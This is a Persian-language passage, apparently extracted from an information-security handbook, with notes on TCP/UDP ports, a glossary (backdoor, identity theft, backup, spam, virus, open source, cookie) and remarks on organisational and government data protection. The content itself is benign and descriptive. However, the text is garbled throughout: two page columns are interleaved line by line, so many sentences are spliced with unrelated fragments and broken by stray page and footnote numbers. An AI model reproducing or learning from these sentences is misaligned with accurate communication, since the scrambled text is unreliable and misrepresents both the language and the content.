ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻧﻴﺰ ﻫﺴﺖ: ﻭﺏ ﻫﻤﻴﺸﻪ ﭘﻮﺭﺕ ﺷﻤﺎﺭﺓ ۸۰ﺍﺳـﺖ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ ﭘﻨﺠـﺮﺓ
ﻣﺮﻭﺭﮔﺮ ﺭﺍ ﺑﺎﺯ ﻣﻲﻛﻨﻴﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﻳﻚ ﭘﻮﺭﺕ ﺭﺍ ﺑﺮﺍﻱ
۱۶ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺍﺭﺳﺎﻟﻲ؛ ﻭ •
ﺧﻮﺩ ﺍﻧﺘﺨﺎﺏ ﻣﻲﻛﻨﺪ )ﻃﺒﻖ ﻗﺮﺍﺭﺩﺍﺩ ،ﺑﺰﺭﮔﺘﺮ ﺍﺯ (۱۰۲۳ﻭ ﺍﻳـﻦ ﻫﻤـﺎﻥ
۱۶ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺩﺭﻳﺎﻓﺘﻲ. • ﭘﻮﺭﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺭﻭﻱ ﺁﻥ ﻣﻨﺘﻈﺮ ﭘﻴﺎﻡ ﺍﻳﺴﺘﺎﺩ.
ﺩﺭ ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﻣﺎﻧﻨﺪ ،TCPﺑﻪ ﺩﻟﻴﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﻤﺎﺭﻩﻫﺎﻱ ﭘﻮﺭﺕ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻃﻮﻝ ﺑﺴﺘﻪﻫﺎﻱ IPﻣﺤﺪﻭﺩ ﺍﺳﺖ ﻭ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ
ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻣﺨﺘﻠﻔــﻲ ﺑﺘﻮﺍﻧﻨــﺪ ﺑﻄــﻮﺭ ﻣــﻮﺍﺯﻱ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﻴﺎﺭ
ﺭﺷﺘﻪ ﻫﺎﻱ UDPﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣﺎﻧﻨـﺪ ﺑﻴﺸﺘﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷﺪ ،ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳـﺪ ﺑـﻪ ﻗـﺴﻤﺘﻬﺎﻱ ﻛـﻮﭼﻜﺘﺮﻱ
ﺩﺭﻳﺎﻓﺖ ﭘﻴـﺎﻡ ﺩﺭ ،TCPﺑﺮﻧﺎﻣـﻪ ﺑﺎﻳـﺪ ﺭﻭﻱ ﭘـﻮﺭﺕ ﺻـﺤﻴﺤﻲ ﺗﻘﺴﻴﻢ ﮔﺮﺩﻧﺪ .ﻫﺮ ﻗﺴﻤﺖ ﺩﺭ ﻗﺎﻟﺐ ﺑﺴﺘﺔ TCPﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ
ﻣﻨﺘﻈﺮ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻡ ﺑﻤﺎﻧـﺪ .ﺩﺭ UDPﻫـﻴﭻ ﺷـﺮﻁ ﻣﺸﺨـﺼﻲ
ﺑﺮﺍﻱ ﺗﺮﺗﻴﺐﺑﻨﺪﻱ ﻭ ﺗﺼﺪﻳﻖ ﺑـﺴﺘﻪﻫـﺎ ﻭﺟـﻮﺩ ﻧـﺪﺍﺭﺩ ،ﻟـﺬﺍ ﺍﻳـﻦ
152 Transmission Control Protocol
153. File Transfer Protocol
154 Sending Port Number
155 Receiving Port Number
158 Reliable Protocol 156 Sequencing Information
159 User Datagram Protocol 157 Acknowledgement Information
١١٣ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
١٦٣
ﺩﺭﺏ ﻣﺨﻔﻲ
ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﮔﺬﺭ ﺍﺯ ﻭﺭﻭﺩ ﻋﺎﺩﻱ ﻭ ﺍﻳﻤـﻦ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻭ
ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﻛﻨﺘﺮﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑـﺪﻭﻥ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ
ﺻﺎﺣﺐ ﺁﻥ ﺍﺳـﺖ .ﺍﮔـﺮ ﺩﺭﺏ ﻣﺨﻔـﻲ ﺭﻭﻱ ﻳـﻚ ﺭﺍﻳﺎﻧـﺔ
ﺿﻤﻴﻤﺔ ۳
ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮ ﺷﺨﺼﻲ ﺩﺭ
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺘﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻭ ﺭﺿﺎﻳﺖ ﻣﺎﻟـﻚ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ ﻭﺍﮊﻩﻧﺎﻣﺔ ﺍﺻﻄﻼﺣﺎﺕ ﻓﻨﻲ
ﺁﻥ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﻛﻨﺘﺮﻝ ﺁﻧﺮﺍ ﺑﺪﺳﺖ ﮔﻴﺮﺩ.
ﺑﺨﺶ ﺩﻭﻡ
ﻫﺴﺘﻨﺪ ،ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻦ ﺑﺎﺯ -ﭼـﻪ ﺁﻧﻬـﺎﻳﻲ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻣـﺸﻜﻼﺕ
ﻛﻪ ﺭﺍﻳﮕـﺎﻥ ﻫـﺴﺘﻨﺪ ﻭ ﭼـﻪ ﺁﻧﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﻓـﺮﻭﺵ ﻻ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﻭ ﺍﻣﻨﻴـﺖ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ
ﺯﻳﺎﺩﻱ ﮔﺮﺩﺩ ﻭ ﻣﻌﻤـﻮ ﹰ
ﻣﻲﺑﺎﺷﻨﺪ -ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛـﻪ ﻣـﺸﺎﺑﻪ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﺪ .ﺑﺎ ﺑﺮﺭﺳﻲ ﻓﻀﺎﻱ ﻛﺎﻓﻲ ﺣﺎﻓﻈﻪ ﻗﺒﻞ ﺍﺯ
ﺍﻧﺤﺼﺎﺭﻱ ﺍﺳﺖ ﻭ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻫﺰﻳﻨـﺔ ﺑـﺎﻻﻳﻲ ﺩﺍﺷـﺘﻪ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺁﻥ ﻣﻲ ﺗـﻮﺍﻥ ﺍﺯ ﻭﻗـﻮﻉ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﺑﺎﺷــﺪ .ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻣــﺘﻦﺑــﺎﺯ ﺗﺤــﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ.
ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺧﺎﺹ ﺑﺼﻮﺭﺕ ﻏﻴﺮ ﺭﺍﻳﮕﺎﻥ ﺩﺭ ١٦٧
ﺳﺮﻗﺖ ﻫﻮﻳﺖ
ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ.
ﺳــﺮﻗﺖ ﻫﻮﻳــﺖ ﺯﻣــﺎﻧﻲ ﺍﺗﻔــﺎﻕ ﻣــﻲﺍﻓﺘــﺪ ﻛــﻪ ﺷــﺨﺺ
ﺑﺮﺍﻱ ﺍﻃﻼﻋـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ
ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﺩﺭ ﻣﻮﺭﺩ ﺷﻤﺎ ﺟﻤﻊﺁﻭﺭﻱ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ ﻭ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ:
ﺑﺎ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺘﻮﺍﻧﺪ ﺧﻮﺩ ﺭﺍ ﺑﺠﺎﻱ ﺷﻤﺎ ﺟﺎ ﺑﺰﻧﺪ )ﻣﺜ ﹰ
ﻼ ﺩﺭ
http://www.fsf.org
ﺑﺎﻧﻜﻬﺎ ،ﻓﺮﻭﺷﮕﺎﻫﻬﺎ ،ﻳﺎ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ(.
http://www.opensource.org
١٦٨
١٧١ ﺿﻤﻴﻤﻪ
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ
ﺿﻤﻴﻤﻪ ﻗﺴﻤﺘﻲ ﺍﺯ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﻓﺮﺁﻳﻨﺪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻣﺤﻠﻬـﺎﻱ
ﺍﺯ ﺁﻥ ﻣﻲﺗﻮﺍﻥ ﺍﻧﻮﺍﻉ ﻓﺎﻳﻠﻬﺎ ﻣﺜﻞ ﻓﺎﻳﻠﻬﺎﻱ ﻣـﺘﻦ ﻭ ﺗـﺼﻮﻳﺮ
ﺩﻳﮕﺮ ﺩﺭ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﻳـﺎ ﺭﻭﻱ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺟـﺎﻧﺒﻲ ﻛـﻪ
ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ .ﺗﻤﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﻏﻴﺮ ﻣﺘﻨﻲ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺑﺎﻳﺪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺴﺘﻘﻞ ﺍﺯ ﺁﻥ ﺭﺍﻳﺎﻧـﻪ ﺑﺎﺷـﻨﺪ .ﻧـﺴﺨﻪ ﻫـﺎﻱ
ﺑﺼﻮﺭﺕ ﻗﺎﺑﻞ ﭼﺎﭖ )ﻣﺘﻦﺳﺎﺩﻩ( ﺩﺭﺁﻳﻨﺪ .ﺗﻤﺎﻣﻲ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ
ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻋﺚ ﻣﻲﺷﻮﻧﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﻫـﺮ
ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﺩ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺍﺭﻗـﺎﻡ ۰ﻭ ۱ﺍﺳـﺖ .ﺑـﻪ
ﻼ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭘﺎﻙ ﺷﺪﻩﺍﻧﺪ ،ﺁﺳـﻴﺐ ﺩﻟﻴﻠﻲ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻪﺍﻧﺪ )ﻣﺜ ﹰ
ﺯﺑﺎﻥ ﺳﺎﺩﻩﺗﺮ ﻛﺪﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺻﻔﺮﻫﺎ ﻭ ﻳﻚﻫﺎ ﺭﺍ ﺑﺎ ﺗﺒﺪﻳﻞ
ﻓﻴﺰﻳﻜﻲ ﺩﻳﺪﻩﺍﻧﺪ ،ﻭ ﻳﺎ ﻣﻮﺭﺩ ﺳـﺮﻗﺖ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ( ﺭﺍ ﺑﺎﺯﻳـﺎﺑﻲ
ﺑﻪ ﻣﺘﻮﻥ ﺳﺎﺩﻩ ،ﻗﺎﺑﻞ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ.
ﻧﻤﺎﻳﻴﺪ.
١٦٩
١٧٢ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ
ﻫﺮﺯﻧﺎﻣﻪ
ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺤﺮﻣﺎﻧﻪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺍﻱ ﻳـﻚ
ﺗﺒﻠﻴﻐﺎﺕ ﻭ ﺩﻳﮕﺮ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ
ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻳﺎ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﺗـﺼﺪﻳﻖ
ﺷﻤﺎ ﺧﻮﺍﺳﺘﻪ ﺑﺎﺷﻴﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ.
ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ.
١٧٣
ﻭﻳﺮﻭﺱ ١٧٠
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ
ﺍﺻﻄﻼﺡ "ﻭﻳﺮﻭﺱ" ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺁﻧﻬﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﺍﺳـﺖ
ﺁﺗﻲ ﺑﻴﺸﺘﺮ ﻣﻮﺭﺩ ﺑﺤﺚ ﻭ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴـﺮﺩ .ﺩﺭﺣـﺎﻝ
ﻭ ﻫﻤﻪ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺁﺯﺍﺩﺍﻧﻪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺻـﻼﺡ ﻛﻨﻨـﺪ ﻭ ﺗﻐﻴﻴـﺮ
ﺣﺎﺿﺮ ﻭﻳﺮﻭﺱ ﺑﻪ ﻣﺠﻤﻮﻋﺔ ﻫﻤـﺔ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﺍﻃـﻼﻕ
ﺩﻫﻨﺪ .ﺑﻪ ﺩﻟﻴﻞ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ،ﺍﻓـﺮﺍﺩ
ﻣﻲﮔﺮﺩﺩ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﻇـﺎﻫﺮ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﻣﻤﻜـﻦ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺤﻮﺓ ﻋﻤﻠﻜﺮﺩ ﺁﻧﺮﺍ ﺑﺒﻴﻨﻨـﺪ ﻭ ﺑـﻪ ﺩﻟﺨـﻮﺍﻩ ﺧـﻮﺩ
ﺍﺳﺖ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻧﻴـﺰ ﺳـﺮﺍﻳﺖ ﻛﻨﻨـﺪ ﻭ ﺑـﻪ ﺁﻧﻬـﺎ
ﻻ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺳﺎﻳﺮ ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ .ﻣﻌﻤﻮ ﹰ
ﺁﺳﻴﺒﻬﺎﻱ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ.
ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ﺭﺍ ﺗــﺸﻮﻳﻖ ﺑــﻪ ﻣــﺸﺎﺭﻛﺖ ﺩﺭ ﺗﻮﺳــﻌﻪ ﻭ
ﮔﺴﺘﺮﺵ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ
ﻣﺘﻦﺑـﺎﺯ ﻫﻤﭽﻨـﻴﻦ ﺷـﺎﻣﻞ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ ﻫـﻢ
١٧٤
URL Cookie
ﻳﻚ ﺁﺩﺭﺱ ﻋﻤـﻮﻣﻲ ﺑـﺮﺍﻱ ﺍﺷـﺎﺭﻩ ﺑـﻪ ﻳـﻚ ﻣﻘـﺼﺪ ﺩﺭ ﻓﺎﻳﻠﻲ ﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺩﺭﺧﻮﺍﺳﺖ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺍﺯ ﺭﺍﻩ
ﺍﻳﻨﺘﺮﻧﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ http://www.infodev.org/ ﺩﻭﺭ ،ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﻧﻮﺷﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺧﻮﺍﻧﺪﻩ
ﻳﺎ mailto: info@worldbank.org ﻣﻲﺷﻮﺩ .ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﻓﺎﻳـﻞ ﺭﻭﻱ
ﺭﺍﻳﺎﻧﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻮﺷﺘﻪ ﺷﻮﺩ ﺗـﺎ ﺑﻌـﺪﻫﺎ ﻫـﻢ ﺑﺘﻮﺍﻧـﺪ ﺁﻧـﺮﺍ
ﻼ ﺍﮔــﺮ ﭘﺎﻳﮕــﺎﻩ ﻭﺑــﻲ ﺍﺯ ﺷــﻤﺎ ﻧــﺎﻡ ﻛــﺎﺭﺑﺮﻱ
ﺑﺨﻮﺍﻧــﺪ .ﻣــﺜ ﹰ
ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﻭﻱ ﺩﻳـﺴﻚ
ﺑﺨﺶ ﺩﻭﻡ
Daemon
HTML
ﺑﺪﻭﻥ ﺑﺮﻧﺎﻣﺔ ﻛﻠﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﻣﺤﻴﻂ ﺍﻣـﻦ ﺑـﺮﺍﻱ ﻓﻨـﺎﻭﺭﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ .ﻫﻤﺰﻣـﺎﻥ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ ﺑـﺮ
ﺍﻃﻼﻋﺎﺕ ،ﻫﺮ ﻗﺴﻤﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺑﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﻧﻴﺰ ﺗﻤﺮﻛﺰ ﻛﻨﻨﺪ ،ﭼﺮﺍﻛﻪ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫﺎﻳـﺸﺎﻥ
ﺍﻣﻨﻴﺖ ﺗﻮﺳﻌﻪ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻣﺄﻣﻮﺭﻳﺘﻬﺎ ،ﺍﻫﺪﺍﻑ ،ﻭ ﻣﻘﺎﺻﺪ ﻋﻤﻠﻴـﺎﺗﻲ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻓـﺮﺍﺩ ﺍﺳـﺖ؛ ﺍﻃﻼﻋـﺎﺗﻲ ﺍﺯ
ﻫﻤﺎﻥ ﻗﺴﻤﺖ ﻧﺎﺷﻲ ﺷﺪﻩ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻫﻤـﺎﻥ ﺍﻧـﺪﺍﺯﻩ ﻛـﻪ ﻗﺒﻴﻞ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﻭ ﺳﻮﺍﺑﻖ ﭘﺰﺷﻜﻲ ،ﺟﻨﺎﻳﻲ ،ﻭ ﻣﺎﻟﻴﺎﺗﻲ.
ﺑﺮﺍﻱ ﻳﻚ ﻗﺴﻤﺖ ﻣﻨﺎﺳﺐ ﺍﺳﺖ ﺑﺮﺍﻱ ﻗﺴﻤﺘﻬﺎﻱ ﺩﻳﮕﺮ ﭼﻨـﺪﺍﻥ ﻣﺘﺄﺳﻔﺎﻧﻪ ﺣﺘﻲ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﺸﻮﺭﻫﺎﻱ ﺻـﻨﻌﺘﻲ ﻧﻴـﺰ
ﺑﻪ ﻛﺎﺭ ﻧﻴﺎﻳﺪ .ﺍﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺍﺳـﺖ ﻭ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻨـﺴﻮﺥ،
ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﻌﻀﻲ ﺣﻮﺯﻩﻫﺎ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻳﺎ ﻛﻤﺘـﺮ ﺍﺯ ﺣـﺪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﻧﺎﻣﻨﺎﺳﺐ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻩﺍﻱ ﻛﻪ ﻓﺎﻗﺪ
ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺗﺄﻣﻴﻦ ﺷﺪﻩ ﺑﺎﺷﺪ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﻭﺟـﻮﺩ ﻧﻈـﺎﺭﺕ ﺍﺯ ﻃـﺮﻑ ﺷﺎﻳﺴﺘﮕﻴﻬﺎﻱ ﻻﺯﻡ ﺩﺭ ﺑﻌﺪ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﺭﻧﺞ
ﻣﺪﻳﺮﻳﺖ ﺳﻄﻮﺡ ﺑﺎﻻ ﺗﻀﻤﻴﻦ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ﻛـﻪ ﺗﺠـﺎﺭﺏ ﺍﻣﻨﻴﺘـﻲ ﻣﻲﺑﺮﺩ .ﻫﻤﺎﻧﻨﺪ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﻣﺆﺳـﺴﺎﺕ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ،
ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻣﺠﻤﻮﻋﺔ ﺳﺎﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﺪ ﻋﻤﻠﻜـﺮﺩ ﺩﻭﻟﺖ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﻪ ﺗﺼﻮﻳﺮ ﻋﻤـﻮﻣﻲ ﺍﻳﺠﺎﺩﺷـﺪﻩ ﺍﺯ ﺧـﻮﺩ ﭘـﺲ ﺍﺯ
ﺑﻬﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﻨﻲ ﻛـﻪ ﺟﻬـﺖ ﺧﺒﺮﻱ ﻭ ﺭﺳﺎﻧﻪﺍﻱ ﺷﺪﻥ ﻫﺮ ﻧﻔﻮﺫ ﻳﺎ ﺭﺧﺪﺍﺩ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺘﻲ ﺍﻫﻤﻴﺖ
ﻲ ﻛــﺎﺭﺁ ﺑــﺮﺍﻱ ﺳــﺎﺯﻣﺎﻥ ﻻﺯﻡﺭﺍﻩﺍﻧــﺪﺍﺯﻱ ﻳــﻚ ﺳﻴــﺴﺘﻢ ﺍﻣﻨﻴﺘ ـ ﹺ ﺩﻫﺪ.
ﻣﻲﺑﺎﺷﻨﺪ ﻳﻚ ﺑﺨـﺶ ﺿـﺮﻭﺭﻱ ﻭ ﺍﺳﺎﺳـﻲ ﺍﻫـﺪﺍﻑ ﺗﺠـﺎﺭﻱ ﺭﺍ
ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺩﺭ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﺑﻬﺎ ﺩﺍﺩ. ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ؛
ﺑﺨﺶ ﺳﻮﻡ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻨﺎﺑﻊ ﻛﻤﺘﺮﻱ ﺑـﺮﺍﻱ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ، ﻣﻮﺗﻮﺭﻫﺎﻱ ﺭﺷﺪ ﻭ ﺗﺮﻗﻲ
